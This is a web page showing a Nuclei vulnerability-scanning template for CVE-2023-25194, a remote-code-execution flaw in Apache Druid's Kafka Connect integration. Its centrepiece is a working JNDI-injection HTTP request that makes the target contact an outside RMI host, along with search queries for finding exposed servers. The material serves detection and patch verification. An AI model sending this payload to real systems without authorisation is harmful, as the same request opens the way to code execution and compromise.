Apache Druid Kafka Connect - Remote Code Execution
ID: CVE-2023-25194
Severity: high
Author: j4vaovo
Tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast
Description
Section titled “Description”The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
YAML Source
Section titled “YAML Source”id: CVE-2023-25194
info: name: Apache Druid Kafka Connect - Remote Code Execution author: j4vaovo severity: high description: | The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html - https://kafka.apache.org/cve-list classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 epss-score: 0.96717 epss-percentile: 0.99653 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: kafka_connect shodan-query: - html:"Apache Druid" - http.html:"apache druid" fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast
http: - raw: - | POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{ "type":"kafka", "spec":{ "type":"kafka", "ioConfig":{ "type":"kafka", "consumerProperties":{ "bootstrap.servers":"127.0.0.1:6666", "sasl.mechanism":"SCRAM-SHA-256", "security.protocol":"SASL_SSL", "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" }, "topic":"test", "useEarliestOffset":true, "inputFormat":{ "type":"regex", "pattern":"([\\s\\S]*)", "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", "columns":[ "raw" ] } }, "dataSchema":{ "dataSource":"sample", "timestampSpec":{ "column":"!!!_no_such_column_!!!", "missingValue":"1970-01-01T00:00:00Z" }, "dimensionsSpec":{
}, "granularitySpec":{ "rollup":false } }, "tuningConfig":{ "type":"kafka" } }, "samplerConfig":{ "numRows":500, "timeoutMs":15000 } }
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: word part: body words: - 'RecordSupplier'
- type: status status: - 400# digest: 4a0a0047304502210083faa4108e70b964f25a243a77f470b67cf15d27714b45436be785cff50149290220327bcbb189715345fa506f9d5c903f32f0c0904ae3ab8d6ed2fc58fef23e90cc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-25194.yaml"